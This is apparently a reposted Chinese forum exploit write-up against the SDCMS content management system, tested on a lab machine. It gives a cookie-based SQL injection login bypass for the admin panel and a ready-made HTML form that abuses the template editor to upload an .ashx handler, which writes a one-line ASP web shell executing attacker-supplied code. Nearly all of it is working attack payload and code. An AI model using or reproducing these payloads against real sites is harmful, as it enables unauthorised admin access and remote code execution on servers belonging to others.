转自:http://t00ls.net/thread-13767-1-1.html,原作者:st4nd

首先在以下地址使用 livehttpheader 抓包得到 COOKIE 值:

    http://192.168.248.129/admin/index.asp?Action=out

COOKIE:

   1Rq4Qz6We6Dbsdcms%5Finfolever=; 1Rq4Qz6We6Dbsdcms%5Falllever=; 1Rq4Qz6We6Dbsdcms%5Fadmin=; 1Rq4Qz6We6Dbsdcms%5Fpwd=; 1Rq4Qz6We6Dbsdcms%5Fname=; 1Rq4Qz6We6Dbsdcms%5Fid=; ASPSESSIONIDCQDBQTAD=BHPFKHJBDBOIPLOMALGOMFAA

查询语句:

   Sql="select sdcms_name,sdcms_pwd from sd_admin where sdcms_name='"&sdcms_adminname&"' And sdcms_pwd='"&sdcms_adminpwd&"'"

   Sql="select sdcms_name,sdcms_pwd from sd_admin where sdcms_name='stcms' or '1'='1' or '1'='1' And sdcms_pwd='LAONA'"

用户名可以前台得到:

    stcms%27%20or%20%271%27%3D%271%27%20or%20%271%27%3D%271

使用 COOKIE EDIT 修改 COOKIE:

    1Rq4Qz6We6Dbsdcms%5Fpwd=123; 1Rq4Qz6We6Dbsdcms%5Fname=stcms' or '1'='1' or '1'='1;1Rq4Qz6We6Dbsdcms%5Fadmin=1;1Rq4Qz6We6Dbsdcms%5Fid=1;

然后进入:

    http://192.168.248.129/admin/sdcms_template.asp?action=add&Path=2009

或者直接使用底下的 fuck.html。

其实就是一个COOKIE,或者进后台吧,虚拟机2003测试的。。。不行当我没发。。。

fuck.html 源码【Exp】:

<table width="98%" border="0" align="center" cellpadding="3" cellspacing="1">
  <form name="add" id="add" method="post" action="http://192.168.248.129/admin/sdcms_template.asp?action=save&t3=True&Path=2009" onSubmit="return checkadd()">
    <tr>
      <td width="120" align="center" class="tdbg">目 录:      </td>
      <td class="tdbg">../Skins/2009/</td>
    </tr>
        <tr>
      <td align="center" class="tdbg">文件名:      </td>
      <td class="tdbg"><input name="t0" type="text" class="input" value="0x255.ashx" id="t0" size="40"> <span>格式:sdcms_index.htm</span></td>
    </tr>
        <tr class="tdbg">
      <td align="center">内容:</td>
      <td><textarea id="t1" name="t1" class="inputs" rows="20">GIF8A
<%@ WebHandler Language="C#" Class="Handler" %>

using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {

public void ProcessRequest (HttpContext context) {
       context.Response.ContentType = "text/plain";
     
       StreamWriter file1= File.CreateText(context.Server.MapPath("root.asp"));
       file1.Write("<%response.clear:execute request(\"0x255.com\"):response.End%>");
       file1.Flush();
       file1.Close();
     
}

public bool IsReusable {
       get {
         return false;
       }
}

}

</textarea></td>
    </tr>
    <tr class="tdbg">
          <td>&nbsp;</td>
      <td><input type="submit" class="bnt" value="保存设置"> <input type="button" onClick="history.go(-1)" class="bnt" value="放弃返回"></td>
    </tr>
        </form>
  </table>